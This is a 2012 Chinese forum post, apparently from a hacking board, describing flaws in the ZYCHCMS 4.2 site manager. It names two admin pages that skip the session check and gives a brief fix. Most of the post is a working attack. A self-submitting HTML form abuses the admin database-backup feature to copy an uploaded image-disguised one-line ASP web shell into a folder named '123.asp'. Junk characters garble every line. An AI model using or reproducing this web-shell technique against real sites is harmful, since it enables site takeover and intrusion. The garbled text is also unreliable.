* D( ], Y1 z& T1 I" I+ m3 a; H
' b/ Z) a! x. C" }! a4 s8 f4 r3 c* [7 h0 ~) s8 _1 K
6 K5 Z( ], ` y6 f u* |影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
/ ~1 t) q! e9 R ①SQL注射漏洞
! _) |1 K% k, I# N 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp1 M9 b; t1 A: l0 n( }
漏洞原因:未过滤% x" c0 l( v; ]* t: E
漏洞代码:3 [! ~7 T% t8 R H: v! ? D
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
' k/ p7 d' D( `0 l1 y! O1 S4 I 修复方法:在文件开头加入代码
( A9 l: d8 {$ f. ^& u$ p- W 4 u! Y% x1 U* C# C9 G. u7 t/ n) Y
: x8 l1 p7 B" f/ w( m1 @5 k2 J" q②后台拿WBSHELL U# z9 N" n. e
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
, p& S7 C& H1 \2 u: n4 }0 v$ x6 V 这里在网上找了一个,改了下,将就着用。* Q, t% Z. G1 g& `
以下是代码本地提交代码
5 Y6 B6 T$ d: w& y8 m 9 R* P* E1 F0 ~2 s
. f6 d6 O9 V& h/ l<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>& e, Q$ W2 |3 `# i# |0 e
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
% W- Q n" H \: K <tr>0 k, B8 a- X9 ?/ d
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>; n# S. i0 p4 N {, B5 y* Q9 `
</tr>
( M! ^) J) Y2 K& v <tr>
. A5 y, `& ]7 T/ ` <td bgcolor=”#FFFFFF”><span class=”back_southidc”>- R3 f m( R! B, k/ I
</span>
: d2 Y* N/ V$ T3 l# o <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
/ f& q4 k7 g" X9 f% m6 S- p <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >6 e* f' [: ^; }) I
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
+ K# }$ v+ e% L/ I <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d; _. f z, J+ ^, _8 u5 B
<div align=”left”>, H% _! B. s* R
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />6 E9 `( H f7 v* I. a3 w
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>0 @9 G, b$ g7 W; O/ P! |
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />- A4 v# q5 B+ r: }
</div></td>
$ Q+ ?6 g5 R/ a# k& C; R </tr>% L% Y# w0 a! T- a8 t3 I
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>9 i$ [% j E/ C
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>" ~! H* a2 w7 e. q- l3 }
<td class=”td”><div align=”left”>: f7 D0 c! d' \4 v2 e/ s! O
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
' Y4 \, q/ o, b& F) e" H A8 l- d [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>* q) n+ U3 {/ E9 J! l
</tr>9 h+ c0 H% N1 n' o/ J8 L
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
/ p5 u( K4 k3 r+ ^/ w <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
3 B, `' A& U( t3 Y <td class=”td”><div align=”left”>
8 f4 [! _/ B( U3 v$ \ <input type=”submit” value=”确定备份” class=”btn”
) P1 Q: t) f# l3 T7 v </div></td>
5 f. z; S3 E8 s, C/ T, |# S </tr>
: `& C! n! D' Y+ l5 z! w0 P </table></td></tr></form>
( E, q) N, F0 u- a0 C+ g. r! r </table>
/ J. k& ]( ?- d </td>
: x; m- B% z& B- ^ </tr> G( b1 c0 R( Q' X' Y
</table>
& j0 U6 Y. m9 }4 k$ W7 P <script>
; u. [2 H3 z" X( M! x1 C9 k. F document.all.add.submit();
+ h. E/ @' C2 J5 R6 s/ Y7 u </script>
' h: X8 j/ W- o* ?8 C/ F4 ]) V/ `
' N9 W a0 | W5 Q( J J
+ v9 N5 x2 ~$ q C# V. X& A& e: ~: h; {. u7 b
0 o- t1 @" [3 I# c
: W0 r9 K0 p* K/ l5 v! U0 y9 v: R& w7 D( C; K1 \
5 `8 u. b, ^! q9 s& t1 g1 ^* E
* p( [3 e0 \# b+ h: W
( S# c) `# C! N# e: t6 J' x9 B/ s I6 S
|
发表于 2012-9-10 21:09:51
收藏
支持
反对